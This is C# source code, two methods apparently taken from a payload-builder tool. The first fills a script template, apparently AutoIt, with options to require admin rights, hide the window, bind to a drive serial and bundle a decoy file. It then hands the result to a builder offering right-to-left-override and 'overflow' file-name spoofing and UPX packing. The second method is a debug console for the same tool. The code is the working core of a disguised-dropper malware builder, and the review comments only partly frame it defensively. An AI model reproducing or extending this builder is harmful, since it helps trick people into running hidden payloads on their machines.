示例#1
        /*
         * Start Build Function - a function that generates the payload script with the corresponding options provided by the user. (Pre-Build Stage)
         * --------------------------------------------------------------------------------------------------------------------------------------------
         * startBuild(
         *      Is in write mode (bool)
         *      Skip pre-build process (bool)
         * )
         * --------------------------------------------------------------------------------------------------------------------------------------------
         * returns: nothing
         */
        private void startBuild(bool isWriteMode = false, bool skipprebuild = false)
        {
            /*
             * Two phases:
             *   1. Pre-build (skipped when skipprebuild is true): load "payloadTemplate.txt", stage working
             *      copies of the selected files, and fill the template's numbered placeholders.
             *   2. Hand-off: pass the filled script either to openminipad() (isWriteMode) or to a modal
             *      buildPayload dialog.
             *
             * Observable artifacts of the pre-build phase, all relative to the current working directory:
             *   "payloadTemplate.txt" (read), "$payloadtmp" and "$spooftmp" (deleted if present, then recreated).
             *
             * NOTE(review): "#RequireAdmin", "@SW_HIDE" and "@SW_SHOW" look like AutoIt directives/macros, so the
             * template is presumably an AutoIt script - confirm against payloadTemplate.txt.
             */
            const string stagedPayload = "$payloadtmp";
            const string stagedSpoof   = "$spooftmp";

            if (!skipprebuild)
            {
                ismodified = false;
                dbgmsg("Starting build...");

                dbgmsg("Importing template...");
                templateData = File.ReadAllText("payloadTemplate.txt");

                // Every mode except 2 stages a copy of the file selected for that mode.
                if (payloadMode != 2)
                {
                    dbgmsg("Importing payload...");
                    if (File.Exists(stagedPayload))
                    {
                        File.Delete(stagedPayload);
                    }
                    File.Copy(payloadFile[payloadMode], stagedPayload);
                }

                dbgmsg("Importing spoofed file...");
                if (File.Exists(stagedSpoof))
                {
                    // Attributes are reset first so that a leftover copy can be deleted.
                    File.SetAttributes(stagedSpoof, FileAttributes.Normal);
                    File.Delete(stagedSpoof);
                }
                File.Copy(ofdSpoof.FileName, stagedSpoof);

                dbgmsg("Writing parsed script to memory...");

                /*
                 * Placeholder values for String.Format, filled in index order:
                 *   0  - "#RequireAdmin" line or null
                 *   1  - payload arguments (mode 2: the payload text box instead), passed through parseEscapeQuotes
                 *   2  - execute through console ("true"/"false", mode 0 only)
                 *   3  - stream console output to a text file ("true"/"false", mode 0 only)
                 *   4  - execute in the target drive ("true"/"false", mode 0 only)
                 *   5  - payload name, or null in mode 2
                 *   6  - spoofed file name
                 *   7  - window visibility macro
                 *   8  - console switch text taken from btnCommand, or "" when not run through the console
                 *   9  - payload mode number
                 *   10 - drive serial check enabled ("true"/"false")
                 *   11 - drive serial to compare against, or "0000000000" when the check is off
                 */
                string rawTemplate = templateData;
                object[] slots = new object[12];

                slots[0] = chkAdminFlag.Checked ? "#RequireAdmin" : null;

                if (payloadMode != 2)
                {
                    slots[1] = chkArguments.Checked ? parseEscapeQuotes(tbArguments.Text) : null;
                }
                else
                {
                    slots[1] = parseEscapeQuotes(tbPayload.Text);
                }

                bool viaConsole = payloadMode == 0 && chkConsole.Checked;
                slots[2] = viaConsole ? "true" : "false";
                slots[3] = (viaConsole && chkStreamConsole.Checked) ? "true" : "false";
                slots[4] = (payloadMode == 0 && chkTarExe.Checked) ? "true" : "false";
                slots[5] = (payloadMode != 2) ? tbPayload.Text : null;
                slots[6] = tbSpoof.Text;
                slots[7] = chkHidWin.Checked ? "@SW_HIDE" : "@SW_SHOW";
                slots[8] = viaConsole ? btnCommand.Text : "";
                slots[9] = payloadMode.ToString();

                // The serial is only looked up when the check box is ticked and excomp[2] is set.
                bool serialBound = chkSerial.Checked && excomp[2];
                slots[10] = serialBound ? "true" : "false";
                slots[11] = serialBound ? getSerial(drpDrives.GetItemText(drpDrives.SelectedItem)) : "0000000000";

                templateData = String.Format(rawTemplate, slots);

                // Mode 2 has no payload file of its own, so an empty "$payloadtmp" is created in its place.
                if (payloadMode == 2)
                {
                    dbgmsg("Creating Payload placeholder...");
                    if (File.Exists(stagedPayload))
                    {
                        File.Delete(stagedPayload);
                    }
                    File.Create(stagedPayload).Close();
                }
            }

            if (isWriteMode)
            {
                openminipad(templateData, true);
                return;
            }

            using (var dialog = new buildPayload())
            {
                // The overflow count is only forwarded when the overflow radio button is selected.
                if (radOverflow.Checked)
                {
                    dialog.overflowCount = overflowCount;
                }

                // Name-spoofing mode: 0 = none, 1 = overflow, 2 = RTLO; left untouched when no radio button is checked.
                // NOTE(review): "RTLO" presumably means the Unicode right-to-left override (U+202E) in the output
                // file name - confirm in buildPayload. File names containing U+202E are the matching detection signal.
                if (radNone.Checked)
                {
                    dialog.spoofMode = 0;
                }
                else if (radOverflow.Checked)
                {
                    dialog.spoofMode = 1;
                }
                else if (radRTLO.Checked)
                {
                    dialog.spoofMode = 2;
                }

                // trimext() output is used as [0] = file name, [1] = extension shown to the user.
                string[] nameParts = trimext(tbSpoof.Text);
                dialog.tbFlNm.Text  = nameParts[0];
                dialog.tbFkExt.Text = nameParts[1];

                dialog.script = templateData;
                dialog.drive  = drpDrives.GetItemText(drpDrives.SelectedItem);
                dialog.isicon = isicon;
                dialog.upx    = excomp[1];
                dialog.ShowDialog();
            }
        }
示例#2
        /*
         * Debug Console Handler - runs one command typed into tbConsole.
         * ---------------------------------------------------------------------------------------------
         * The text is split on single spaces; the first token, lower-cased, selects the command and the
         * remaining tokens are its operands. Unknown commands print the command list.
         *
         * NOTE(review): operands are read by index without a length check, so a command typed without
         * its operands throws IndexOutOfRangeException. Convert.ToInt32 throws on non-numeric input, and
         * "teststrformat" passes operator-typed text as the composite format string.
         * tbConsole is cleared only when the command finishes without throwing.
         * ---------------------------------------------------------------------------------------------
         * returns: nothing
         */
        private void btnConsole_Click(object sender, EventArgs e)
        {
            string[] argv = tbConsole.Text.Split(' ');
            string verb = argv[0].ToLower();

            switch (verb)
            {
                case "setdrive":
                    // Adds the typed drive to the drop-down and selects it.
                    drpDrives.Items.Add(argv[1]);
                    drpDrives.SelectedIndex = drpDrives.Items.Count - 1;
                    dbgmsg("Override command -- Drive selection set and added -- " + argv[1]);
                    break;

                case "exit":
                    Application.Exit();
                    break;

                case "setoverflowcount":
                    overflowCount = Convert.ToInt32(argv[1]);
                    dbgmsg("Overflow loop count changed to " + argv[1]);
                    break;

                case "setimagelocation":
                    imgFileIcon.ImageLocation = argv[1];
                    dbgmsg("Image location set : " + argv[1]);
                    break;

                case "cls":
                    dbgRtb.Text = string.Empty;
                    break;

                case "overflowdebugmsg":
                    // Emits one long line to the debug log.
                    dbgmsg("The quick brown fox jumps over the lazy dog The quick brown fox jumps over the lazy dog The quick brown fox jumps over the lazy dog The quick brown fox jumps over the lazy dog");
                    break;

                case "showpayloadfile":
                    dbgmsg("payloadFile[0]=" + payloadFile[0]);
                    dbgmsg("payloadFile[1]=" + payloadFile[1]);
                    break;

                case "checkcomp":     // See the documentation of "checkComponent" for the debug arguments/parameters
                    dbgmsg("Testing checkComponent() Function");
                    dbgmsg("Test returned a value of: " + checkComponent(argv[1], argv[2], argv[3], argv[4], argv[5]).ToString());
                    break;

                case "teststrformat":
                    dbgmsg("strformat:" + String.Format(argv[1], argv[2]));
                    break;

                case "formsetwidth":
                    dbgmsg("Form width set to: " + argv[1]);
                    this.Width = Convert.ToInt32(argv[1]);
                    break;

                case "cleanup":
                    cleanup();
                    break;

                case "showallui":
                {
                    dbgmsg("showing all ui...");
                    // All three forms are constructed before any of them is shown.
                    about        aboutForm   = new about();
                    buildPayload builderForm = new buildPayload();
                    minipad      editorForm  = new minipad();
                    aboutForm.Show();
                    builderForm.Show();
                    editorForm.Show();
                    break;
                }

                case "rtlo":
                    // Logs the operand prefixed with globalClass.rtlo.
                    dbgmsg(globalClass.rtlo + argv[1]);
                    break;

                case "getserial":
                    dbgmsg("driveserial: " + getSerial(argv[1]));
                    break;

                case "testnet":
                    dbgmsg("result:" + testNet(argv[1]));
                    break;

                case "rep":
                    // Shows the operand with every double quote doubled.
                    dbgmsg("result: " + argv[1].Replace("\"", "\"\""));
                    break;

                default:
                    dbgmsg("Bad command! Available commands:\nsetdrive [driveletter]\nsetoverflowcount [integer]\nsetimagelocation [filepath]\nshowpayloadfile\noverflowdebugmsg\ncheckcomp [name] [filename] [size] [link] [desc]\nteststrformat [string] [data]\nformsetwidth [integer]\ncleanup\nshowallui\nrtlo [string]\ngetserial [drive]\ntestnet [address]\nrep [string]\ncls\nexit\n");
                    break;
            }

            tbConsole.Text = "";
        }